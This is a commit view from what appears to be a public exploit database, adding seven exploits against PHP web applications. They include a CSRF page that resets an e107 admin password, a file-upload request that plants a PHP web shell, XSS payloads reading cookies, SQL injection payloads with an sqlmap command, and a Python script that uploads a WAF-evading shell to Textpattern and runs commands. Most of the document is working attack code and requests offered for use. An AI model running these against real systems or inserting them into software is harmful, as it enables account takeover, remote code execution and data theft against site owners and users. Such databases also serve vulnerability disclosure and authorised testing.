Browse Source

DB: 2021-03-05

8 changes to exploits/shellcodes

e107 CMS 2.3.0 - CSRF
Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
pull/195/merge 2021-03-05
Offensive Security 1 month ago
parent
commit
5572674576
9 changed files with 334 additions and 0 deletions
  1. +1
    -0
      exploits/php/webapps/47289.txt
  2. +70
    -0
      exploits/php/webapps/49614.txt
  3. +79
    -0
      exploits/php/webapps/49615.txt
  4. +18
    -0
      exploits/php/webapps/49616.txt
  5. +18
    -0
      exploits/php/webapps/49617.txt
  6. +19
    -0
      exploits/php/webapps/49618.txt
  7. +18
    -0
      exploits/php/webapps/49619.txt
  8. +104
    -0
      exploits/php/webapps/49620.py
  9. +7
    -0
      files_exploits.csv

+ 1
- 0
exploits/php/webapps/47289.txt View File

@ -4,6 +4,7 @@
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79
# CVE: CVE-2020-23518
[Description]


+ 70
- 0
exploits/php/webapps/49614.txt View File

@ -0,0 +1,70 @@
# Exploit Title: e107 CMS 2.3.0 - CSRF
# Date: 04/03/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://e107.org
# Software Link: https://e107.org/download
# Version: 2.3.0
# Tested on: Windows 10
# CVE : CVE-2021-27885
CSRF vulnerability on e107 CMS
## Bug Description
Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.
## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF login POC using the following code.
```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
<form method="POST" name="form0" action="
http://localhost/[path-to-e107-cms]/usersettings.php">
<input type="hidden" name="loginname" value="admin"/>
<input type="hidden" name="email" value="[email]"/>
<input type="hidden" name="password1" value="[password]"/>
<input type="hidden" name="password2" value="[password]"/>
<input type="hidden" name="hideemail" value="1"/>
<input type="hidden" name="image" value=""/>
<input type="hidden" name="signature" value=""/>
<input type="hidden" name="updatesettings" value="Save settings"/>
<input type="hidden" name="_uid" value="2"/>
</form>
</body>
</html>
```
2. Replace the email and password with the valid credentials.
3. Send the link script to the victim (admin) to make them click.
4. Login with new admin password

+ 79
- 0
exploits/php/webapps/49615.txt View File

@ -0,0 +1,79 @@
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
# Date: 04/03/2021
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10, XAMPP
Request:
========
POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
Gecko/20100101 Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------14955282031852449676680360880
Content-Length: 972
Origin: http://localhost
Connection: close
Referer: http://localhost/onlineordering/GPST/store/index.php
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
Upgrade-Insecure-Requests: 1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="transnum"
VAF-XAP
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select1"
25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="pname"
keychain
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select2"
1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="txtDisplay"
25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="note"
test
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo "Shell";system($_GET['cmd']); ?>
-----------------------------14955282031852449676680360880--
Response:
=========
HTTP/1.1 200 OK
Date: Thu, 04 Mar 2021 13:28:27 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 55
Connection: close
Content-Type: text/html; charset=UTF-8
<meta http-equiv="refresh" content="1; url=index.php">
# Uploaded Malicious File can be Found in :
onlineordering\GPST\store\design
# go to
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
which will execute hostname command.

+ 18
- 0
exploits/php/webapps/49616.txt View File

@ -0,0 +1,18 @@
# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-04
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://textpattern.com
# Software Link: https://textpattern.com/start
# Version: v 4.8.4
# Tested on: Windows
Steps-To-Reproduce:
1. Login into Textpattern CMS admin panel.
2. Now go to the *Content > C**omments > Message*.
3. Now paste the below payload in the URL field.
Ba1man”><img src=x onerror=confirm(document.location)>
4. Now click on the *Save* button.
5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head
5. The XSS will be triggered.

+ 18
- 0
exploits/php/webapps/49617.txt View File

@ -0,0 +1,18 @@
# Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-04
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://textpattern.com
# Software Link: https://textpattern.com/start
# Version: v 4.9.0-dev
# Tested on: Windows
Steps-To-Reproduce:
1. Login into Textpattern CMS admin panel.
2. Now go to the *Content > Write > ** Excerpt*.
3. Now paste the below payload in the URL field.
Ba1man”><img src=x onerror=confirm(document.cookie)>
4. Now click on the *Save* button.
5. Now go to the *articles* page
5. The XSS will be triggered.

+ 19
- 0
exploits/php/webapps/49618.txt View File

@ -0,0 +1,19 @@
# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id
*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.
CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9
<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
--batch --dbs
3) Using the above command we will get the name of all the database.

+ 18
- 0
exploits/php/webapps/49619.txt View File

@ -0,0 +1,18 @@
# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
# Date: 04-03-2021
# Exploit Author: Deepak Kumar Bharti
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0
# Tested on: Windows 10 Pro
# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in Welcome page in quiz section eid parameter affected from this vulnerability.
# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
POC:
# go to url http://localhost/login.php
# then you have to login with default creds
# then go to quiz and execute the payload ie:--
http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

+ 104
- 0
exploits/php/webapps/49620.py View File

@ -0,0 +1,104 @@
# Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
# Date: 03/03/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/start
# Version: Previous to 4.8.3
# Tested on: CentOS, textpattern 4.5.7 and 4.6.0
# Install dependencies: pip3 install beautifulsoup4 argparse requests
# Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d
import sys
import argparse
import requests
from bs4 import BeautifulSoup
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
parser.add_argument('-u', '--user', required=True, action='store', help='Username')
parser.add_argument('-p', '--password', required=True, action='store', help='Password')
parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute')
parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload')
parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command')
my_args = parser.parse_args()
return my_args
def get_file_id(s, files_url, file_name):
r = s.get(files_url, verify=False)
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.findAll('a'):
if "file_download/" in a['href']:
file_id_name = a['href'].split('file_download/')[1].split("/")
if file_id_name[1] == file_name:
file_id = file_id_name[0]
return file_id
def login(login_url, user, password):
s = requests.Session()
s.get(login_url, verify=False)
data = {"p_userid":user, "p_password":password, "_txp_token":""}
r = s.post(login_url, data=data, verify=False)
if str(r.status_code) == "401":
print("[+] Invalid credentials")
sys.exit(0)
_txp_token = ""
soup = BeautifulSoup(r.text, "html.parser")
fields = soup.findAll('input')
for f in fields:
if (f['name'] == "_txp_token"):
_txp_token = f['value']
return s,_txp_token
def upload(s, login_url, _txp_token, file_name):
php_payload = '<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n'*1000 # to avoid WAF problems
php_payload += '<?php $test = shell_exec($_REQUEST[\'cmd\']); echo $test; ?>'
s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False)
def exec_cmd(s, cmd_url, command):
r = s.get(cmd_url+command, verify=False)
response = r.text.replace("<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n","")
return response
def delete_file(s, login_url, file_id, _txp_token):
data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token}
s.post(login_url, data=data, verify=False)
def main():
args = get_args()
url = args.target
user = args.user
password = args.password
file_name = args.filename
command = args.command
delete_after_execute = args.delete
login_url = url + "/textpattern/index.php"
upload_url = url + "/textpattern/index.php"
cmd_url = url + "/files/" + file_name + "?cmd="
files_url = url + "/textpattern/index.php?event=file"
s,_txp_token = login(login_url, user, password)
print("[+] Logged in")
upload(s, login_url, _txp_token, file_name)
file_id = get_file_id(s, files_url, file_name)
print("[+] File uploaded with id %s"%(file_id))
response = exec_cmd(s, cmd_url, command)
print("[+] Command output \n%s"%(response))
if delete_after_execute:
print("[+] Deleting uploaded file %s with id %s" %(file_name, file_id))
delete_file(s, login_url, file_id, _txp_token)
else:
print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name))
if __name__ == "__main__":
main()

+ 7
- 0
files_exploits.csv View File

@ -43800,3 +43800,10 @@ id,file,description,date,author,type,platform,port
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,
49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",2021-03-04,Tadjmen,webapps,php,
49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution",2021-03-04,"Suraj Bhosale",webapps,php,
49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,
49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,

Loading…
Cancel
Save